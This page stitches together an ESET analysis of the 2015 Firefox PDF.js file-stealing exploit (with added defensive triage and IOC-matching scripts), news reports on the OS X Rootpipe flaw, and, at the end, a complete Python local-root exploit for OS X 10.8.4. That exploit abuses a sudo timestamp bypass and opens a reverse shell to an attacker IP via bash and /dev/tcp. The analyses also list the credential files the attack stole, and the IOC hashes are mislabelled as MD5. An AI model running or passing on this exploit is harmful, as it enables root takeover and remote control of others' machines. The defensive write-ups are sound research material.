Firefox Under Fire: Anatomy of latest 0-day attack

On August 6th, 2015, the Mozilla Foundation released a security update for the Firefox web browser that fixes the CVE-2015-4495 vulnerability in Firefox’s embedded PDF viewer, PDF.js. This vulnerability allows attackers to bypass the same-origin policy and execute JavaScript remotely that will be interpreted in the local file context. This, in turn, allows attackers to read and write files on the local machine as well as upload them to a remote server. The exploit for this vulnerability is being actively used in the wild, so Firefox users are advised to update to the latest version (39.0.3 at the time of writing) immediately.

In this blog we provide an analysis of two versions of the script and share details about the associated attacks against Windows, Linux and OS X systems.

According to ESET’s LiveGrid® telemetry, the server at the IP address 185.86.77.48, which was hosting the malicious script, has been up since July 27, 2015. We also found corroboration on one of the compromised forums:

[Figure 1: post on one of the compromised forums]

Operatives from the Department on Combating Cybercrime of the Ministry of Internal Affairs of Ukraine, who responded promptly to our notification, have also confirmed that the malicious exfiltration server, hosted in Ukraine, has been online since July 27, 2015.

According to our monitoring of the threat, the server became inactive on August 8, 2015.

 

The script

The script used is not obfuscated and easy to analyze. Nevertheless, the code shows that the attackers had good knowledge of Firefox internals.

The malicious script creates an IFRAME with an empty PDF blob. When Firefox is about to open the PDF blob with the internal PDF viewer (PDF.js), new code is injected into the IFRAME (Figure 2). When this code executes, a new sandboxContext property is created within wrappedJSObject. A JavaScript function is written to the sandboxContext property. This function will later be invoked by subsequent code. Together, these steps lead to the successful bypass of the same-origin policy.

Code that creates sandboxContext property

The exploit is very reliable and works smoothly. However, it may display a warning which can catch the attention of tech-savvy users.

The warning message shown on a compromised site

After successful exploitation of the bug, execution passes to the exfiltration part of the code. The script supports both the Linux and Windows platforms. On Windows it searches for configuration files belonging to popular FTP clients (such as FileZilla, SmartFTP and others), the SVN client, instant messaging clients (Psi+ and Pidgin), and the Amazon S3 client.

The list of collected files on Windows at the first stage of the attack

These configuration files may contain saved login and password details.

On Linux systems, the script sends the following files to the remote server:

  • /etc/passwd
  • /etc/hosts
  • /etc/hostname
  • /etc/issue

It also parses the /etc/passwd file in order to get the home directories (homedir) of the users on the system. The script then searches for files by filename mask in the home directories collected, skipping the home directories of standard system users (such as daemon, bin, sys, sync and so forth).

The list of collected files on Linux at stage 1 of the attack

It collects and uploads such files as:

  • shell and database history files (bash, MySQL, PostgreSQL)
  • SSH related configuration files and authorization keys
  • Configuration files for remote access software – Remmina
  • FileZilla configuration files
  • PSI+ configuration
  • text files with possible credentials and shell scripts
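The file classes listed above are what an incident responder has to assume were taken from any Linux host whose user browsed a compromised site with a vulnerable Firefox. The following triage helper is an added example (not ESET’s code and not the attackers’ script) that reproduces only the selection logic described in the text (parse /etc/passwd for home directories, skip the named system accounts, match the listed file classes) so that the exposed credentials can be rotated. The /etc/passwd excerpt, the list of file paths, the UID threshold of 1000 and the filename patterns are constructed assumptions; the text mentions only the file classes, not exact masks.

```python
import os
import re

# Constructed /etc/passwd excerpt: a mix of system accounts and two regular users.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
"""

# Constructed stand-in for a filesystem listing (absolute paths of regular files).
SAMPLE_FS = {
    "/root/.bash_history",
    "/root/.ssh/authorized_keys",
    "/home/alice/.bash_history",
    "/home/alice/.ssh/id_rsa",
    "/home/alice/.filezilla/sitemanager.xml",
    "/home/alice/notes/passwords.txt",
    "/home/alice/photo.jpg",
    "/home/bob/.psql_history",
    "/home/bob/deploy.sh",
    "/usr/sbin/.bash_history",   # lives in daemon's home: must be ignored
    "/var/www/.ssh/config",      # lives in www-data's home: must be ignored
}

# Accounts named in the write-up as skipped by the script, plus an assumed UID
# cut-off for other service accounts. Root (UID 0) is kept: /root holds the same
# kinds of history and key files.
SYSTEM_ACCOUNTS = {"daemon", "bin", "sys", "sync"}
MIN_REGULAR_UID = 1000

# File classes from the write-up, expressed as assumed patterns on the path
# relative to the home directory.
EXPOSED_PATTERNS = [
    ("shell or database history", re.compile(r"^\.(bash|mysql|psql)_history$")),
    ("SSH configuration or key material", re.compile(r"^\.ssh/")),
    ("Remmina remote-access profile", re.compile(r"^\.remmina/")),
    ("FileZilla configuration", re.compile(r"^\.filezilla/")),
    ("Psi+ configuration", re.compile(r"^\.config/psi\+/")),
    ("shell script", re.compile(r"\.sh$")),
    ("text file with a credential-like name",
     re.compile(r"(?i)(pass|passwd|password|cred|login)[^/]*\.txt$")),
]


def home_dirs(passwd_text):
    """Map user name -> home directory for accounts a responder should review."""
    homes = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[2].isdigit():
            continue
        name, uid, home = fields[0], int(fields[2]), fields[5]
        if name in SYSTEM_ACCOUNTS or (uid != 0 and uid < MIN_REGULAR_UID):
            continue
        homes[name] = home.rstrip("/") or "/"
    return homes


def classify(relative_path):
    """Return the exposure label for a path relative to a home dir, or None."""
    for label, pattern in EXPOSED_PATTERNS:
        if pattern.search(relative_path):
            return label
    return None


def exposed_files(passwd_text, all_paths):
    """user -> sorted list of (absolute path, label) the responder must treat as stolen."""
    report = {}
    for user, home in sorted(home_dirs(passwd_text).items()):
        prefix = home if home.endswith("/") else home + "/"
        for path in sorted(all_paths):
            if not path.startswith(prefix):
                continue
            label = classify(path[len(prefix):])
            if label:
                report.setdefault(user, []).append((path, label))
    return report


def collect_paths(homes):
    """Enumerate regular files under real home directories (live-host use only)."""
    found = set()
    for home in homes.values():
        for root, _dirs, files in os.walk(home, onerror=lambda _err: None):
            found.update(os.path.join(root, name) for name in files)
    return found


if __name__ == "__main__":
    for user, entries in exposed_files(SAMPLE_PASSWD, SAMPLE_FS).items():
        for path, label in entries:
            print(f"{user}: {path}  [{label}]")
```

On a live host, replace the fixtures with `open("/etc/passwd").read()` and `collect_paths(home_dirs(...))`; every path reported is a candidate for key rotation or password change rather than something to merely clean up, since the script uploaded the files rather than deleting them.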

As is evident here, the purpose of the first version of the malicious script was to gather data used mostly by webmasters and site administrators. This allowed attackers to move on to compromising more websites.

 

The second version

The day after Mozilla released the patch for Firefox the attackers decided to go “all-in”: they registered two new domains and improved their script.

The two new malicious domains were maxcdnn[.]com (93.115.38.136) and acintcdn[.]net (185.86.77.48). The second IP address is the same one as used in the first version. Attackers selected these names because the domains look as if they belong to a content delivery network (CDN).

The improved script on the Windows platform not only collects configuration files for applications; it also collects text files containing almost all combinations of words of possible value to attackers (such as password, accounts, bitcoins, credit cards, exploits, certificates, and so on):

List of files collected on Windows during the second attack stage

The attackers improved the Linux script by adding new files to collect and also developed code that works on the Mac OS X operating system:

List of files collected on Macs during the second stage of an attack

Some Russian-speaking commentators misattributed this code to the Duqu malware, because some variables in the code have the text “dq” in them.

 

A copycat attack

Since the bug is easy to exploit and a working copy of the script is available to cybercriminals, different attackers have started to use it. We have seen that various groups quickly adopted the exploit and started to serve it, mostly on adult sites, from google-user-cache[.]com (108.61.205.41).

This malicious script does all the same things as the original script, but it collects different files:

The list of collected files used in copycat attack

 

Conclusion

The recent Firefox attacks are an example of active in-the-wild exploitation of a serious software vulnerability. The exploit shows that the malware-writers had a deep knowledge of Firefox internals. It is also an interesting one, since in most cases, exploits are used as an infection vector for other data-stealing trojans. In this instance, however, that was not necessary, because the malicious script alone was able to steal sensitive files from victims’ systems.

Additionally, the exploit started to be reused by other malware operators shortly after its discovery. This is common practice in the malware world.

ESET detects the malicious scripts as JS/Exploit.CVE-2015-4495. We also urge Firefox users to update their browser to the patched version (39.0.3). The internal Firefox PDF reader can also be disabled by changing the pdfjs.disabled setting to true.

 

Indicators of Compromise

A partial list of compromised servers:

  • hxxp://www.akipress.org/
  • hxxp://www.tazabek.kg/
  • hxxp://www.super.kg/
  • hxxp://www.rusmmg.ru/
  • hxxp://forum.cs-cart.com/
  • hxxp://www.searchengines.ru/
  • hxxp://forum.nag.ru/

Servers used in attack:

  • maxcdnn[.]com (93.115.38.136)
  • acintcdn[.]net (185.86.77.48)
  • google-user-cache[.]com (108.61.205.41)

Hashes (MD5):

  • 0A19CC67A471A352D76ACDA6327BC179547A7A25
  • 2B1A220D523E46335823E7274093B5D44F262049
  • 19BA06ADF175E2798F17A57FD38A855C83AAE03B
  • 3EC8733AB8EAAEBD01E5379936F7181BCE4886B3
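The indicators above are what a defender can act on right away. The following is an added example (not ESET’s code) showing how to sweep proxy logs for the listed domains and IPs, check a file digest against the listed hashes, and triage a captured page script with a heuristic built from the description earlier in the write-up (a function written into the sandboxContext property of wrappedJSObject, from an IFRAME that loads an empty PDF blob). The log lines and the script fixture are constructed; the heuristic is a triage aid, not a signature for the exploit. One caveat a practitioner will notice: the four hashes are 40 hex characters long, which is the length of a SHA-1 digest, not MD5 (32 characters), so the helper below names the algorithm from the length before comparing.

```python
import re

# Network indicators copied from the "Indicators of Compromise" list, refanged.
IOC_DOMAINS = {"maxcdnn.com", "acintcdn.net", "google-user-cache.com"}
IOC_IPS = {"93.115.38.136", "185.86.77.48", "108.61.205.41"}
IOC_HASHES = {
    "0A19CC67A471A352D76ACDA6327BC179547A7A25",
    "2B1A220D523E46335823E7274093B5D44F262049",
    "19BA06ADF175E2798F17A57FD38A855C83AAE03B",
    "3EC8733AB8EAAEBD01E5379936F7181BCE4886B3",
}

# Markers taken from the description of the script. Both required names must be
# present, plus at least one context marker, before a script is flagged.
REQUIRED_MARKERS = ("wrappedjsobject", "sandboxcontext")
CONTEXT_MARKERS = ("iframe", "blob")


def hash_algorithm(hex_digest):
    """Name the digest algorithm from its hex length (32=MD5, 40=SHA-1, 64=SHA-256)."""
    return {32: "md5", 40: "sha1", 64: "sha256"}.get(len(hex_digest.strip()), "unknown")


def matches_known_hash(hex_digest):
    """True if the digest (any case) is one of the listed indicator hashes."""
    return hex_digest.strip().upper() in IOC_HASHES


def refang(text):
    """Turn defanged notation ('hxxp', '[.]') back into matchable text."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def match_network_iocs(log_lines):
    """Return (line_number, indicator) pairs for lines mentioning a listed domain or IP."""
    hits = []
    for number, raw in enumerate(log_lines, 1):
        line = refang(raw).lower()
        for domain in sorted(IOC_DOMAINS):
            # Boundaries keep 'maxcdnn.com' from matching inside 'notmaxcdnn.com';
            # a leading '.' is allowed so subdomains of an indicator still hit.
            if re.search(r"(?<![a-z0-9-])" + re.escape(domain) + r"(?![a-z0-9-])", line):
                hits.append((number, domain))
        for ip in sorted(IOC_IPS):
            if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
                hits.append((number, ip))
    return hits


def script_matches_description(source):
    """Heuristic: does a page script show the structure the write-up describes?"""
    text = source.lower()
    return (all(marker in text for marker in REQUIRED_MARKERS)
            and any(marker in text for marker in CONTEXT_MARKERS))


# Constructed proxy log lines (timestamp, client, method, URL, status); not real traffic.
SAMPLE_PROXY_LOG = [
    "1438906123.412 10.0.0.5 GET http://www.example.org/index.html 200",
    "1438906124.001 10.0.0.5 GET http://maxcdnn.com/jquery.min.js 200",
    "1438906125.330 10.0.0.9 POST http://185.86.77.48/upload.php 200",
    "1438906126.010 10.0.0.5 GET http://cdn.example.net/lib.js 200",
]

# Constructed fixture that only mirrors the described structure; not the real script.
SAMPLE_SCRIPT = """
var frame = document.createElement('iframe');
frame.src = URL.createObjectURL(new Blob([], {type: 'application/pdf'}));
/* ... later ... */
target.wrappedJSObject.sandboxContext = callback;
"""


if __name__ == "__main__":
    for number, indicator in match_network_iocs(SAMPLE_PROXY_LOG):
        print(f"line {number}: contacted indicator {indicator}")
    digest = "0A19CC67A471A352D76ACDA6327BC179547A7A25"
    print(f"{digest} is a {hash_algorithm(digest)} digest; known={matches_known_hash(digest)}")
    print(f"script flagged: {script_matches_description(SAMPLE_SCRIPT)}")
```

Feed `match_network_iocs` the lines of a real proxy or DNS log to find hosts that contacted the attackers’ servers during the window the text gives (July 27 to August 8, 2015). For the mitigation mentioned in the conclusion, the same preference can be set from a Firefox user.js file with `user_pref("pdfjs.disabled", true);`.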

 
 

Credit:  Anton Cherepanov

Critical Mac OS X Yosemite Vulnerability Allows Root Access Without Password

 

A Swedish Security researcher has discovered a critical vulnerability in Apple’s OS X Yosemite that gives hackers the ability to escalate administrative privileges on a compromised machine, and allows them to gain the highest level of access on a machine, known as root access.

 

The vulnerability, dubbed “Rootpipe”, was uncovered by Swedish white-hat hacker Emil Kvarnhammar, who is withholding the full details of the privilege escalation bug until January 2015, as Apple needs some time to prepare a security patch.

“Details on the #rootpipe exploit will be presented, but not now. Let’s just give Apple some time to roll out a patch to affected users,” Emil Kvarnhammar, IT specialist and hacker at security company Truesec, tweeted.

By exploiting the vulnerability in the Mac OS X Yosemite, an attacker could bypass the usual safeguard mechanisms which are supposed to stop anyone who tries to root the operating system through a temporary backdoor.

 

 

ROOT ACCESS WITHOUT PASSWORD

Once exploited, hackers could install malicious software or make other changes to your computer without needing a password.

Hackers could steal victims’ sensitive information such as passwords or bank account information, or, if they wished, format the entire affected computer, deleting all your important data.

Kvarnhammar has also provided a video to explain his initial finding.

“It all started when I was preparing for two security events, one in Stockholm and one in Malmö,” Kvarnhammar says. “I wanted to show a flaw in Mac OS X, but relatively few have been published. There are a few ‘proof of concepts’ online, but the latest I found affected the older 10.8.5 version of OS X. I couldn’t find anything similar for 10.9 or 10.10.”

Kvarnhammar tested the vulnerability on OS X version 10.8, 10.9 and 10.10. He has confirmed that it has existed since at least 2012, but probably is much older than that.

 

INFORMED APPLE

Kvarnhammar contacted Apple about the issue but initially didn’t get any response; Apple later quietly asked him for more details. When he provided the details, Apple asked Truesec not to disclose them until next January.

Kvarnhammar said, “The current agreement with Apple is to disclose all details in mid-January 2015. This might sound like a long wait, but hey, time flies. It’s important that they have time to patch, and that the patch is available for some time.”

 

HOW TO PROTECT

The full disclosure of the vulnerability will be made public in January, after Apple provides a fix. Apple OS X Yosemite users are advised to follow the steps below to protect themselves from exploitation of Rootpipe:
  • Avoid running the system on a daily basis with an admin account. An attacker who gains control of this account will then obtain only limited privileges.
  • Use Apple’s FileVault volume encryption tool, which encrypts and decrypts on the fly, keeping your information protected at all times.

However, the best way to protect yourself from such security vulnerabilities is to ensure that the operating system running on your system is always up to date, and to always be careful with the links and documents others send to you.
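Both recommendations can be verified on a Mac in a few lines. The following is an added example (not from the article, Truesec or Apple) that parses the output of two standard macOS commands, `dscl . -read /Groups/admin GroupMembership` (which prints a `GroupMembership:` line listing admin users) and `fdesetup status` (whose first line reads `FileVault is On.` or `FileVault is Off.`), and reports which of the two pieces of advice a given account is not following. The sample command outputs embedded below are constructed so the logic can be exercised on any platform; on macOS the script runs the real commands.

```python
import getpass
import platform
import subprocess


def admin_members(dscl_output):
    """Parse `dscl . -read /Groups/admin GroupMembership` output into a set of user names."""
    members = set()
    for line in dscl_output.splitlines():
        if line.startswith("GroupMembership:"):
            members.update(line.split(":", 1)[1].split())
    return members


def filevault_enabled(fdesetup_output):
    """Interpret `fdesetup status`: the first line states whether FileVault is On or Off."""
    stripped = fdesetup_output.strip()
    first_line = stripped.splitlines()[0] if stripped else ""
    return first_line.startswith("FileVault is On")


def assess(user, dscl_output, fdesetup_output):
    """Return the list of recommendations from the article that this setup violates."""
    findings = []
    if user in admin_members(dscl_output):
        findings.append(f"{user} is a member of the admin group: use a standard "
                        "account for day-to-day work")
    if not filevault_enabled(fdesetup_output):
        findings.append("FileVault is off: enable full-disk encryption")
    return findings


def live_outputs():
    """Run the two commands on a real Mac and return their stdout text."""
    dscl = subprocess.run(["dscl", ".", "-read", "/Groups/admin", "GroupMembership"],
                          capture_output=True, text=True).stdout
    fde = subprocess.run(["fdesetup", "status"], capture_output=True, text=True).stdout
    return dscl, fde


# Constructed command outputs used when not running on macOS.
SAMPLE_DSCL = "GroupMembership: root alice\n"
SAMPLE_FDE_OFF = "FileVault is Off.\n"
SAMPLE_FDE_ON = "FileVault is On.\n"


if __name__ == "__main__":
    if platform.system() == "Darwin":
        dscl_out, fde_out = live_outputs()
        user = getpass.getuser()
    else:
        dscl_out, fde_out, user = SAMPLE_DSCL, SAMPLE_FDE_OFF, "alice"
    for finding in assess(user, dscl_out, fde_out) or ["no findings"]:
        print(finding)
```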

 
 
 

Credit:  Muhit Kumar, thehackernews

 

Apple OS X Yosemite infested by nasty ‘Rootpipe’ vulnerability

 

A Swedish security researcher has turned up a serious vulnerability in OS X “Yosemite”, but details are to be withheld until January, giving Apple time to prepare a patch.

The vuln was first described in mid-October, when Truesec posted a YouTube video (below) that sketchily described the existence of the bug.


Truesec researcher Emil Kvarnhammar says he discovered a way to get past the user controls on Apple’s terminal shell, to gain access to a shell with root privileges. The vulnerability subverts the password requirements for someone to run sudo – that is, to access the shell as a superuser.

While Kvarnhammar hasn’t told the world whether it’s a purely local exploit or remotely exploitable, the advice he gives suggests the latter. First, Apple users should create their day-to-day account (without admin privileges) as a separate user and not run as Administrator for “normal” operations. Second, users should turn on FileVault to encrypt their hard drives.

Kvarnhammar is quoted in Swedish media (for example, here), picked up in English all over the world, as saying he’s tested the bug on OS X 10.8, 10.9 and 10.10. He has confirmed that it has existed since at least 2012, but probably is much older than that.

 

 

Credit:  Richard Chirgwin, theregister

OSX <= 10.8.4 – Local Root Priv Escalation (py)

#!/usr/bin/python
# Original MSF Module:
# https://github.com/rapid7/metasploit-framework/blob/master/modules
# /exploits/osx/local/sudo_password_bypass.rb
########################################################################
# Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr:
# 127.0.0.1 and port 4444
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
########################################################################
import subprocess
# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"
# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"
# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE,
                        stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT "
                 "-setdate 01:01:1970 -settime 00:00;sudo su\n"
                 "bash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr, port))
print """
########################################################################
#
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
########################################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr, port)